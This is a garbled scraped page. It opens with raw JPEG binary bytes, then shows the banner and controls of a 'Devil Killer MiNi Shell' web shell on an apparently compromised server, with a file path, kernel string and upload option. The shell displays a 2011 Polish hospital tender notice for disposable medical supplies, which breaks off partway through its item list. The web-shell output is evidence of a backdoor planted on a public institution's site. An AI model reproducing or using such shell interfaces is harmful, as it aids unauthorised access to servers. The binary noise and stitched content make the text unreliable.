JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110411/71984-N-2011.html

<p class="kh_header"><b>Suwałki: dostawa  sprzętu medycznego jednorazowego użytku i strzygarki chirurgicznej   dla SPSW w Suwałkach</b><br>
<b>Numer ogłoszenia: 71984 - 2011; data zamieszczenia: 11.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa  sprzętu medycznego jednorazowego użytku i strzygarki chirurgicznej   dla SPSW w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu medycznego jednorazowego użytku i strzygarki chirurgicznej dla SPSW w Suwałkach w asortymencie i w szacunkowej ilości określonych w załączniku nr 5 do SIWZ w okresie 12 miesięcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.72.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 63.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w prawidłowej wysokości dla danego pakietu, na który Wykonawca składa ofertę. Kwota wadium dla ofert całkowitych wynosi 9.764,00 zł, a dla ofert częściowych kwoty wymaganych wadiów zawiera załącznik nr 6 do SIWZ. 
2.Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (musi być poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (art.45 ust. 6  PZP).  
3.Wadium musi być udzielane do końca terminu związania ofertą.                                                                                                           
4.Wadium wnosi się przed upływem terminu składania ofert. 
5.Wadium wnoszone w pieniądzu  wpłaca się  przelewem na poniższy rachunek bankowy Zamawiającego : 
	
Kredyt Bank S.A. 1710 Oddział KB SA w Suwałkach Nr 42 1500 1719 1217 1002 6998 0000 
6.Warunki zwrotu wadium i utraty wadium reguluje ustawa pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: posiadania uprawnienia do wykonania okreslonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. W celu potwierdzenia spełnienia warunków udziałuw postępowaniu Zamawiający wymaga dołączenia do oferty: oświadczenia o spełnieniu warunków udziału okreslonych w oświadczeniu znajdującym się w druku oferty załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: posiadania wiedzy i doświadczenia. W celu potwierdzenia spełnienia warunków udziałuw postępowaniu Zamawiający wymaga dołączenia do oferty: oświadczenia o spełnieniu warunków udziału okreslonych w oświadczeniu znajdującym się w druku oferty załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:dysponowania odpowiednim potencjałem oraz osobami zdolnymi do wykonania zamówienia. W celu potwierdzenia spełnienia warunków udziałuw postępowaniu Zamawiający wymaga dołączenia do oferty: oświadczenia o spełnieniu warunków udziału okreslonych w oświadczeniu znajdującym się w druku oferty załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: sytuacji ekonomicznej i finansowej. W celu potwierdzenia spełnienia warunków udziałuw postępowaniu Zamawiający wymaga dołączenia do oferty: oświadczenia o spełnieniu warunków udziału okreslonych w oświadczeniu znajdującym się w druku oferty załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)oświadczenia, że oferowany asortyment posiada dokumenty wymagane przez polskie prawo, na podstawie których może być wprowadzony do obrotu i stosowania w placówkach ochrony zdrowia w RP oraz oznaczenie CE - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ 
2)wypełnionych formularzy asortymentowo - cenowych (wzór stanowi załącznik nr 5 do SIWZ) 
3)katalogu (prospektu), w którym został zaznaczony oferowany asortyment (pozycja z kodem) -  w przypadku firm dysponujących katalogiem (prospektem) zawierającym różny asortyment. W przypadku firm, które dysponują odrębnymi katalogami (prospektami) dla oferowanego asortymentu zobowiązane są one do dołączenia do oferty tylko tych katalogów (prospektów), które dotyczą oferowanego asortymentu

Zamawiający wymaga także dołączenia do oferty:

1)wypełnionego druku oferty, który stanowi załącznik nr 1 do SIWZ  
2)pełnomocnictwa dla osoby składającej ofertę w przypadku działania Wykonawcy przez pełnomocnika
3)pełnomocnictwa dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego 
4) kopii dowodu wpłaty wadium wpłaconego w pieniądzu (przelew lub wpłata w kasie Zamawiającego). W pozostałych przypadkach należy załączyć do oferty oryginalny dokument wniesienia wadium.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający może odstąpić od niniejszej umowy w trybie i na zasadach określonych w art. 145 PZP.
2. Zamawiający zgodnie z art. 144 ustawy Pzp przewiduję zmianę postanowień zawartej   umowy w stosunku do treści oferty tj.:
a) wydłużenia terminu realizacji umowy, o którym mowa w § 10 ust. 1 projektu umowy, z chwilą niewykorzystania przez Zamawiającego wartości umowy, o której mowa w § 10ust. 1 niniejszej umowy;
b) zamiany poszczególnego asortymentu, będącego przedmiotem umowy i wyszczególnionego w Załączniku nr 1 do niniejszej umowy, z chwilą zaprzestania lub wstrzymania jego produkcji, a o czym Wykonawca nie mógł wiedzieć z chwilą zawarcia niniejszej umowy, na tzw. zamiennik pod warunkiem, że spełni on wszystkie wymogi Zamawiającego w tym również cenę jednostkową netto i brutto;
c) Zamawiający zastrzega sobie możliwość zmiany ilości poszczególnego asortymentu, będącego przedmiotem umowy i wyszczególnionego w Załączniku nr 1 do niniejszej umowy w zakresie łącznej wartości umowy, o której mowa w § 1 ust. 1 projektu umowy.
d)  numeru katalogowego produktu,
	- nazwy produktu przy zachowaniu jego parametrów,
	- sposobu konfekcjonowania,
	- liczby opakowań
	w sytuacji gdy:
	- wprowadzony zostanie do sprzedaży przez Wykonawcę produkt zmodyfikowany/udoskonalony
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.
3. Strony zgodnie ustalają, że w przypadku: 
1) zmiany statusu prawnego Zamawiającego, 
2) ograniczenia lub utraty istotnej części kontraktu z Narodowym Funduszem Zdrowia, 
3) istotnego ograniczenia zakresu i ilości świadczonych usług zdrowotnych , 
4) zmian organizacyjnych u Zamawiającego, 
     
rozwiązanie  zawartej   umowy  może  nastąpić  w  każdym  czasie  za  porozumieniem  stron  lub  w  drodze  miesięcznego jej wypowiedzenia, niezależnie od uprawnień wynikających z art. 145 PZP.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny  Szpital Wojewódzki w Suwałkach, Dział Zamówień Publicznych, ul. Szpitalna 60, 16 - 400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2011 godzina 09:30, miejsce: Samodzielny Publiczny Szpital Wojewózki w Suwałkach, Kancelaria, ul. Szpitalna 60, 16 - 400 Suwałki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bielizna operacyjna z włókniny sterylna   Wymagany asortyment  wykonany z  wysokiej jakości włókniny, posiadającej odpowiednią gramaturę; kolor zielony bądź niebieski, włóknina spełniająca normę polską, sterylne - minimalne wymagania jakościowe, typ i rozmiar zgodnie z opisem :
1. Fartuch chirurgiczny wykonany w części kontaktującej się bezpośrednio z polem operacyjnym z włókniny nieprzemakalnej miękkiej zapewniającej zabezpieczenie przed przedostaniem się zakaźnych płynów na ciało personelu medycznego i o gramaturze 68 - 75 g/m2; w rozmiarach L, XL, mankiet zebrany w ściągacz szt.100
2. Zarękawnik z włókniny ofoliowanej, sterylny, jednorazowego użytku, z mankietem o gramaturze 43 g/m2; 	para	75.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE   NR 1   
Rękawice chirurgiczne, lateksowe, sterylne, pudrowe, zgodnie z normą  EN 455-1.2.3.; niska zawartość pudru i protein lateksowych, kształt w pełni anatomiczny (przeciwstawny kciuk, zagięte palce); rolowany mankiet, oznakowanie  CE; oporne na rozerwanie, łatwe w nakładaniu, dobrze dopasowane, powierzchnia  mikroporowata; dostępne w rozmiarach: 9; 8,5; 8; 7,5; 7; 6,5; 6 para 44 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE   NR 2		
Rękawice chirurgiczne z przedłużonym mankietem - położniczo- ginekologiczne, pudrowane, wskaźnik AQL 1,5 DIN EN 455 1+2+3;  długi mankiet ok. 20 - 28cm; koniec zrolowany, przylegające do ręki, mikroporowata powierzchnia dłoni, w rozmiarach: 8,5 - 6,5 co 0,5 rozm.	para	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3		
Rękawice chirurgiczne Neoprenowe, bezpudrowe. o anatomicznym kształcie, mankiet prosty, mikroteksturowane, sterylizowane, o wartości finałowego uwalniania AQL 1.0 , zgodnie z normą  EN 455-1.2.3, w rozmiarach: 9 - 6 co 0,5 rozm.	para	8 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4		
Rękawice chirurgiczne Lateksowe bezpudrowe,  przebadane na zawartość alergenów lateksowych, o anatomicznym kształcie, mankiet prosty, mikroteksturowane, o wartości finałowego uwalniania AQL 1,0, zgodnie z normą  EN 455-1.2.3  w rozmiarach: 9 - 6 co 0,5 rozm.	para	6 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE   NR 5		
Rękawice diagnostyczne lateksowe - opak. a 100 szt, zgodnie z normą         EN 455- 1.2.3; potwierdzone przez dołączony do oferty certyfikat jednostki notyfikowanej, niska zawartość pudru, cienkie,    pasujące   na   obie   dłonie,
rolowany mankiet, oznakowane CE.w rozm. S, M, L opak.	13 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RĘKAWICE NR 6 Rękawice diagnostyczne nitrylowe bezpudrowe  zgodnie z normą         EN 455- 1.2.3; potwierdzone przez dołączony do oferty certyfikat jednostki notyfikowanej, niska zawartość pudru, cienkie,    pasujące   na   obie   dłonie, rolowany mankiet, oznakowane CE opak. 	4 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR 7
Rękawice foliowe w rozm. Damskie i męskie pakowane po 100 szt.  opak.	1 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 8  Rękawice do przygotowywania cytostatyków, niesterylne, bezpudrowe. Nitrylowe o przedłużonym mankiecie, teksturowane na palcach, o długości 300 mm. Rozmiary S, M, L,  - zgodnie z normą:  EN 374, EN 455 1-2-3; opakowanie: a 100 szt.	opak.	45.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR 1 
Cewnik moczowodowy umożliwiający cofanie i obracanie cewnikiem nawet po wyjęciu prowadnicy (inteligentny popychacz). Skalowany co 1 cm z linią pozycyjną ułatwiającą pozycjonowanie w moczowodzie; rozm. Od 4,8 - 7F (od 26-30cm)
1. Cewnik moczowodowy - podwójny PIGTAIL - sterylny  rozmiar 7F/26 szt.	20
2. Cewnik moczowodowy - podwójny PIGTAIL - sterylny  rozmiar 7F/28 szt.	20
